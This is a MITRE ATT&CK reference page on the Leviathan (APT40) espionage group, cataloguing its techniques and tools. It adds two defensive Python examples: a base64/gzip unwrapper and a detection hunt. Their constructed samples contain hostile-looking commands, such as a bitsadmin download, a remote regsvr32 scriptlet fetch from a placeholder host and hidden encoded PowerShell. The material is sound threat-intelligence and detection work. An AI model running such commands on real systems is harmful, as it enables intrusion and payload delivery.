Currently viewing ATT&CK v14.1, which was live between October 31, 2023 and April 22, 2024.

Leviathan

Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.[1][2][3]

ID: G0065
Associated Groups: MUDCARP, Kryptonite Panda, Gadolinium, BRONZE MOHAWK, TEMP.Jumper, APT40, TEMP.Periscope
Contributors: Valerii Marchuk, Cybersecurity Help s.r.o.
Version: 3.0
Created: 18 April 2018
Last Modified: 15 April 2022

Associated Group Descriptions

Name  Description
MUDCARP  [1][4]
Kryptonite Panda  [1][5]
Gadolinium  [1][6]
BRONZE MOHAWK  [1][7]
TEMP.Jumper  Leviathan was previously reported by FireEye as TEMP.Periscope and TEMP.Jumper.[1][8]
APT40  FireEye reporting on TEMP.Periscope (later merged into APT40) indicates that TEMP.Periscope has also been reported as Leviathan.[1][2][3][8]
TEMP.Periscope  Leviathan was previously reported by FireEye as TEMP.Periscope and TEMP.Jumper.[1][3][8]

Techniques Used

Domain ID Name Use
Enterprise T1583 .001 Acquire Infrastructure: Domains

Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.[1][4]

Enterprise T1560 Archive Collected Data

Leviathan has archived victim's data prior to exfiltration.[1]

Enterprise T1197 BITS Jobs

Leviathan has used BITSAdmin to download additional tools.[3]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3]

.009 Boot or Logon Autostart Execution: Shortcut Modification

Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Leviathan has used PowerShell for execution.[2][3][1][4]

.005 Command and Scripting Interpreter: Visual Basic

Leviathan has used VBScript.[2]

Enterprise T1586 .001 Compromise Accounts: Social Media Accounts

Leviathan has compromised social media accounts to conduct social engineering attacks.[1]

.002 Compromise Accounts: Email Accounts

Leviathan has compromised email accounts to conduct social engineering attacks.[1]

Enterprise T1074 .001 Data Staged: Local Data Staging

Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.[3][1]

.002 Data Staged: Remote Data Staging

Leviathan has staged data remotely prior to exfiltration.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information

Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.[2]

Enterprise T1189 Drive-by Compromise

Leviathan has infected victims using watering holes.[1]

Enterprise T1585 .001 Establish Accounts: Social Media Accounts

Leviathan has created new social media accounts for targeting efforts.[1]

.002 Establish Accounts: Email Accounts

Leviathan has created new email accounts for targeting efforts.[1]

Enterprise T1546 .003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

Leviathan has used WMI for persistence.[3]

Enterprise T1041 Exfiltration Over C2 Channel

Leviathan has exfiltrated data over its C2 channel.[1]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[2][3]

Enterprise T1203 Exploitation for Client Execution

Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[2][3][1][4]

Enterprise T1133 External Remote Services

Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.[1]

Enterprise T1589 .001 Gather Victim Identity Information: Credentials

Leviathan has collected compromised credentials to use for targeting efforts.[1]

Enterprise T1105 Ingress Tool Transfer

Leviathan has downloaded additional scripts and files from adversary-controlled servers.[2][3]

Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

Leviathan has used OLE to embed malicious content in phishing documents.[4]

Enterprise T1534 Internal Spearphishing

Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.[1]

Enterprise T1027 Obfuscated Files or Information

Leviathan has obfuscated code using base64 and gzip compression.[2]

.001 Binary Padding

Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.[2]

.003 Steganography

Leviathan has used steganography to hide stolen data inside other files stored on GitHub.[1]

Enterprise T1003 OS Credential Dumping

Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.[8]

.001 LSASS Memory

Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.[8]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.[2][1]

.002 Phishing: Spearphishing Link

Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.[2][1]

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.[4]

Enterprise T1572 Protocol Tunneling

Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.[1]

Enterprise T1090 .003 Proxy: Multi-hop Proxy

Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.[1]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Leviathan has targeted RDP credentials and used RDP to move laterally through the victim environment.[8]

.004 Remote Services: SSH

Leviathan has used SSH for internal reconnaissance.[8]

Enterprise T1505 .003 Server Software Component: Web Shell

Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.[8][1]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Leviathan has used stolen code signing certificates to sign malware.[3][8]

Enterprise T1218 .010 System Binary Proxy Execution: Regsvr32

Leviathan has used regsvr32 for execution.[2]

Enterprise T1204 .001 User Execution: Malicious Link

Leviathan has sent spearphishing email links attempting to get a user to click.[2][1]

.002 User Execution: Malicious File

Leviathan has sent spearphishing attachments attempting to get a user to open them.[2][1]

Enterprise T1078 Valid Accounts

Leviathan has obtained valid accounts to gain initial access.[1][4]

Enterprise T1102 .003 Web Service: One-Way Communication

Leviathan has received C2 instructions from user profiles created on legitimate websites such as GitHub and TechNet.[3]

Enterprise T1047 Windows Management Instrumentation

Leviathan has used WMI for execution.[2]
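The table above records three linked procedures: code obfuscated with base64 and gzip (T1027), garbage characters inserted into that code (T1027.001), and a loader (SeDll) that decodes and executes the next JavaScript stage (T1140). The following is an added example, written for this page and not taken from ATT&CK or from any reported Leviathan sample: an analyst-side unwrapper that strips junk characters, peels base64 and gzip layers in whatever order they occur, and stops when it reaches the plaintext script. The JScript stage, the junk alphabet and the layer order are constructed here for illustration; the hostname and path inside the script are placeholders.

```python
"""Added example (not ATT&CK's or any reported Leviathan sample): an analyst-side
unwrapper for layered obfuscation: base64 wrapped around gzip (T1027), junk
characters sprinkled into the encoded text (T1027.001), and the decode-then-execute
step a loader such as the reported SeDll performs (T1140). The script, junk alphabet
and layer order below are constructed for illustration."""
import base64
import binascii
import gzip

GZIP_MAGIC = b"\x1f\x8b"
_B64_BYTES = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def strip_garbage(blob: bytes) -> bytes:
    """Drop every byte outside the base64 alphabet (undoes junk-character insertion)."""
    return bytes(c for c in blob if c in _B64_BYTES)


def garbage_count(blob: bytes) -> int:
    """Number of junk bytes removed; a high count in a 'base64' blob is itself a signal."""
    return len(blob) - len(strip_garbage(blob))


def _is_text(blob: bytes) -> bool:
    return bool(blob) and all(32 <= c < 127 or c in (9, 10, 13) for c in blob)


def try_base64(blob: bytes):
    """Return the decoded layer only if it decodes cleanly AND the result is something
    recognisable (a gzip stream or printable text). Random bytes produced by
    mis-decoding a plaintext script fail this check, which stops the loop at the
    real payload instead of mangling it."""
    cleaned = strip_garbage(blob)
    if len(cleaned) < 8:
        return None
    cleaned += b"=" * (-len(cleaned) % 4)  # restore padding the obfuscator may have dropped
    try:
        out = base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None
    if out.startswith(GZIP_MAGIC) or _is_text(out):
        return out
    return None


def unwrap(blob: bytes, max_layers: int = 16):
    """Peel gzip and base64 layers until neither applies; returns (payload, layer_names)."""
    layers = []
    for _ in range(max_layers):
        if blob.startswith(GZIP_MAGIC):
            try:
                blob = gzip.decompress(blob)
            except (OSError, EOFError):
                break
            layers.append("gzip")
            continue
        decoded = try_base64(blob)
        if decoded is None:
            break
        blob, layers = decoded, layers + ["base64"]
    return blob, layers


# Constructed sample: a dropped JScript stage as it might look before obfuscation.
# The host name and path are placeholders, not indicators.
SCRIPT = (b'var sh = new ActiveXObject("WScript.Shell");\r\n'
          b'sh.Run("cmd.exe /c bitsadmin /transfer j http://c2.example.invalid/a.dat C:/PerfLogs/a.dat", 0);\r\n')


def obfuscate(script: bytes, junk: bytes = b"#~^", every: int = 7) -> bytes:
    """Sample generator: gzip, base64, then insert one junk byte after every `every` chars."""
    encoded = base64.b64encode(gzip.compress(script))
    out = bytearray()
    for i, c in enumerate(encoded):
        if i and i % every == 0:
            out.append(junk[(i // every) % len(junk)])
        out.append(c)
    return bytes(out)


SAMPLE = base64.b64encode(obfuscate(SCRIPT))  # outer base64 layer over the junk-laden inner one

if __name__ == "__main__":
    payload, layers = unwrap(SAMPLE)
    print("layers peeled:", layers)
    print("junk bytes in inner layer:", garbage_count(obfuscate(SCRIPT)))
    print(payload.decode())
```

The acceptance test in try_base64 is what keeps the loop honest: a plaintext script stripped of its punctuation still looks like a base64 string, but decoding it yields non-printable bytes (or fails validation outright), so the unwrapper returns the script rather than a further "layer" of noise. garbage_count is worth surfacing in triage output on its own, since legitimate base64 blobs contain no bytes outside the alphabet.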

Software

ID Name References Techniques
S0110 at [8] Scheduled Task/Job: At
S0642 BADFLICK [3][4] Archive Collected Data: Archive via Library, Data from Local System, Deobfuscate/Decode Files or Information, File and Directory Discovery, Ingress Tool Transfer, Phishing: Spearphishing Attachment, System Information Discovery, System Network Configuration Discovery, User Execution: Malicious File, Virtualization/Sandbox Evasion: Time Based Evasion
S0190 BITSAdmin [3] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S0069 BLACKCOFFEE [3] Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Indicator Removal: File Deletion, Multi-Stage Channels, Process Discovery, Web Service: Dead Drop Resolver, Web Service: Bidirectional Communication
S0020 China Chopper [3][1][4] Application Layer Protocol: Web Protocols, Brute Force: Password Guessing, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, File and Directory Discovery, Indicator Removal: Timestomp, Ingress Tool Transfer, Network Service Discovery, Obfuscated Files or Information: Software Packing, Server Software Component: Web Shell
S0154 Cobalt Strike [2][3][1] Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, BITS Jobs, Browser Session Hijacking, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Protocol Impersonation, Data Transfer Size Limits, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Exploitation for Client Execution, Exploitation for Privilege Escalation, File and Directory Discovery, Hide Artifacts: Process Argument Spoofing, Impair Defenses: Disable or Modify Tools, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Network Service Discovery, Network Share Discovery, Non-Application Layer Protocol, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information, Office Application Startup: Office Template Macros, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Process Hollowing, Process Injection, Protocol Tunneling, Proxy: Domain Fronting, Proxy: Internal Proxy, Query Registry, Reflective Code Loading, Remote Services: Remote Desktop Protocol, Remote Services: SSH, Remote Services: Windows Remote Management, Remote Services: SMB/Windows Admin Shares, Remote Services: Distributed Component Object Model, Remote System Discovery, Scheduled Transfer, Screen Capture, Software Discovery, Subvert Trust Controls: Code Signing, System Binary Proxy Execution: Rundll32, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, Use Alternate Authentication Material: Pass the Hash, Valid Accounts: Domain Accounts, Valid Accounts: Local Accounts, Windows Management Instrumentation
S0021 Derusbi [3][1] Audio Capture, Command and Scripting Interpreter: Unix Shell, Encrypted Channel: Symmetric Cryptography, Fallback Channels, File and Directory Discovery, Indicator Removal: Timestomp, Indicator Removal: File Deletion, Input Capture: Keylogging, Non-Application Layer Protocol, Non-Standard Port, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Screen Capture, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Owner/User Discovery, Video Capture
S0363 Empire [1] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data, Automated Collection, Automated Exfiltration, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Browser Information Discovery, Clipboard Data, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Windows Service, Credentials from Password Stores: Credentials from Web Browsers, Domain Policy Modification: Group Policy Modification, Domain Trust Discovery, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Accessibility Features, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Discovery, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Native API, Network Service Discovery, Network Share Discovery, Network Sniffing, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Trusted Developer Utilities Proxy Execution: MSBuild, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Video Capture, Web Service: Bidirectional Communication, Windows Management Instrumentation
S0032 gh0st RAT [1] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Deobfuscate/Decode Files or Information, Dynamic Resolution: Fast Flux DNS, Encrypted Channel: Symmetric Cryptography, Encrypted Channel, Hijack Execution Flow: DLL Side-Loading, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Non-Application Layer Protocol, Process Discovery, Process Injection, Query Registry, Screen Capture, Shared Modules, System Binary Proxy Execution: Rundll32, System Information Discovery, System Services: Service Execution
S0232 HOMEFRY [3] Command and Scripting Interpreter: Windows Command Shell, Obfuscated Files or Information, OS Credential Dumping
S0233 MURKYTOP [3][1] Account Discovery: Local Account, Command and Scripting Interpreter: Windows Command Shell, Indicator Removal: File Deletion, Network Service Discovery, Network Share Discovery, Permission Groups Discovery, Remote System Discovery, Scheduled Task/Job: At, System Information Discovery
S0228 NanHaiShu [2][1] Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Impair Defenses: Disable or Modify Tools, Indicator Removal: File Deletion, Ingress Tool Transfer, Obfuscated Files or Information, System Binary Proxy Execution: Mshta, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery
S0039 Net [8] Account Discovery: Domain Account, Account Discovery: Local Account, Create Account: Local Account, Create Account: Domain Account, Indicator Removal: Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, System Time Discovery
S0229 Orz [2][1][4] Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Indicator Removal, Ingress Tool Transfer, Modify Registry, Obfuscated Files or Information, Process Discovery, Process Injection: Process Hollowing, Software Discovery, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Network Configuration Discovery, Web Service: Bidirectional Communication
S0194 PowerSploit [1] Access Token Manipulation, Account Discovery: Local Account, Audio Capture, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Security Support Provider, Command and Scripting Interpreter: PowerShell, Create or Modify System Process: Windows Service, Credentials from Password Stores: Windows Credential Manager, Data from Local System, Domain Trust Discovery, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: Path Interception by Search Order Hijacking, Input Capture: Keylogging, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Reflective Code Loading, Scheduled Task/Job: Scheduled Task, Screen Capture, Steal or Forge Kerberos Tickets: Kerberoasting, Unsecured Credentials: Credentials in Registry, Unsecured Credentials: Group Policy Preferences, Windows Management Instrumentation
S0183 Tor [1] Encrypted Channel: Asymmetric Cryptography, Proxy: Multi-hop Proxy
S0005 Windows Credential Editor [8] OS Credential Dumping: LSASS Memory
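Several rows in the Techniques and Software tables above describe host activity that leaves process-creation and file-creation telemetry: BITSAdmin downloads (T1197), regsvr32 execution (T1218.010; Derusbi and Orz also map to it), script hosts and mshta launched from Office documents (T1203, T1059.005; NanHaiShu maps to Mshta), PowerShell (T1059.001; Cobalt Strike, Empire and PowerSploit all map to it), shortcut files written into the Startup folder by JavaScript (T1547.001/.009), archives written to C:\Windows\Debug or C:\Perflogs (T1074.001 with T1560), and WMI event subscriptions for persistence (T1546.003). The following is an added example, written for this page and not taken from ATT&CK or from the reports it cites: a small hunt that runs one rule per procedure over constructed event records. The command-line patterns (for example regsvr32's /i:http scriptlet form and PowerShell's -enc switch) are generic detection heuristics for the named binaries, not indicators from Leviathan reporting; the archive extensions are an assumption; every event, host name, user name and path below is made up for illustration.

```python
"""Added example (not from ATT&CK or the reports it cites): a hunt over constructed
Windows process-creation and file-creation records for procedures catalogued on
this page. Command-line patterns are generic heuristics for the named binaries,
not indicators from Leviathan reporting; all events below are constructed."""
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe", "regsvr32.exe"}
LNK_WRITERS = {"wscript.exe", "cscript.exe", "mshta.exe"}
STAGING_DIRS = ("c:\\windows\\debug\\", "c:\\perflogs\\")      # T1074.001 directories named on the page
ARCHIVE_EXTS = (".rar", ".zip", ".7z", ".cab")                  # assumed archive types for T1560
STARTUP_DIR = "\\start menu\\programs\\startup\\"
WMI_SUB_CLASSES = ("__eventfilter", "commandlineeventconsumer", "__filtertoconsumerbinding")
ENCODED_PS = re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}")  # -e/-ec/-enc <base64>


def _img(ev):
    return ntpath.basename(ev.get("image", "")).lower()


def _parent(ev):
    return ntpath.basename(ev.get("parent", "")).lower()


def _cmd(ev):
    return ev.get("cmdline", "").lower()


def _path(ev):
    return ev.get("path", "").lower()


# (technique ID from this page, rule name, predicate over one event)
RULES = [
    ("T1197", "bitsadmin_http_download",
     lambda e: e["type"] == "process" and _img(e) == "bitsadmin.exe"
     and "/transfer" in _cmd(e) and "http" in _cmd(e)),
    ("T1218.010", "regsvr32_remote_scriptlet",
     lambda e: e["type"] == "process" and _img(e) == "regsvr32.exe"
     and ("/i:http" in _cmd(e) or "scrobj.dll" in _cmd(e))),
    ("T1203", "office_spawns_script_host",
     lambda e: e["type"] == "process" and _parent(e) in OFFICE_APPS and _img(e) in SCRIPT_HOSTS),
    ("T1059.001", "powershell_encoded_command",
     lambda e: e["type"] == "process" and _img(e) == "powershell.exe"
     and ENCODED_PS.search(_cmd(e)) is not None),
    ("T1547.001", "script_host_writes_startup_lnk",
     lambda e: e["type"] == "file" and _img(e) in LNK_WRITERS
     and STARTUP_DIR in _path(e) and _path(e).endswith(".lnk")),
    ("T1074.001", "archive_written_to_staging_dir",
     lambda e: e["type"] == "file" and _path(e).startswith(STAGING_DIRS)
     and _path(e).endswith(ARCHIVE_EXTS)),
    ("T1546.003", "wmi_permanent_subscription_created",
     lambda e: e["type"] == "process" and any(k in _cmd(e) for k in WMI_SUB_CLASSES)
     and ("root\\subscription" in _cmd(e) or "root/subscription" in _cmd(e))),
]


def hunt(events):
    """Run every rule over every event; returns one hit dict per (event, rule) match."""
    hits = []
    for idx, ev in enumerate(events):
        for technique, name, pred in RULES:
            if pred(ev):
                hits.append({"index": idx, "technique": technique, "rule": name, "image": _img(ev)})
    return hits


# Constructed telemetry (Sysmon-style process and file records); the last two are benign.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://c2.example.invalid/u.dat C:\PerfLogs\u.dat"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://c2.example.invalid/s.sct scrobj.dll"},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\update.js"},
    {"type": "file", "image": r"C:\Windows\System32\wscript.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office Update.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="},
    {"type": "file", "image": r"C:\Windows\Temp\rar.exe", "path": r"C:\Windows\Debug\1.rar"},
    {"type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="f1", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60"'},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"type": "file", "image": r"C:\Windows\System32\svchost.exe", "path": r"C:\Windows\Debug\WIA\wiatrace.log"},
]

if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f'event {h["index"]}: {h["technique"]} {h["rule"]} ({h["image"]})')
```

Each rule keys on the combination the page actually describes (the binary plus the argument or parent that makes it suspicious) rather than on the binary alone, which is why the benign bitsadmin /list and the svchost.exe log write in C:\Windows\Debug do not fire. The staging-directory rule is the one most worth tuning per environment: both directories legitimately receive log files, so the archive-extension filter is doing the real work there.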

References